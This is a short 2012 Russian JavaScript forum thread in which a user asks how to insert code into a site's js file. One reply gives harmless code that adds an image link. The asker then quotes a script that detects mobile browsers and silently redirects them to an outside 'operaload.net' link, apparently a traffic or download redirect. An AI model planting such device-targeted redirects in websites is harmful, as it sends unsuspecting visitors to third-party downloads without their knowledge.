Javascript-форум (https://javascript.ru/forum/)
-   Общие вопросы Javascript (https://javascript.ru/forum/misc/)
-   -   Добавление кода js в js файл (https://javascript.ru/forum/misc/24747-dobavlenie-koda-js-v-js-fajjl.html)

trikadin 12.01.2012 20:15

Так в чём проблема-то? Откройте в блокноте и впихните!

Правда, я не очень понимаю, как вы в js файл хотите картинку запихнуть.

FINoM 12.01.2012 20:17

var img = document.createElement('img');
var a = document.createElement('a');
img.src="/...";
a.href="...";
a.appendChild(img);
document.body.appendChild(a);


Как-то так. Вообще можно таким же образом создать див и засунуть ссылку с картинкой через innerHTML.

BEUJ 12.01.2012 20:44

Цитата:

Сообщение от FINoM (Сообщение 149953)
var img = document.createElement('img');
var a = document.createElement('a');
img.src="/...";
a.href="...";
a.appendChild(img);
document.body.appendChild(a);


Как-то так. Вообще можно таким же образом создать див и засунуть ссылку с картинкой через innerHTML.

Спасибо, а как
<script type="text/javascript">
 <!--
 if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk)/i)!==null){
 window.location = "http://operaload.net/u/73";
 }
 //-->
 </script>
вот этот код туда впихнуть? Просто прям в таком виде? Или изменить надо?

FINoM 12.01.2012 21:35

Копировать → вставить. Что за вопросы.


Часовой пояс GMT +3, время: 18:59.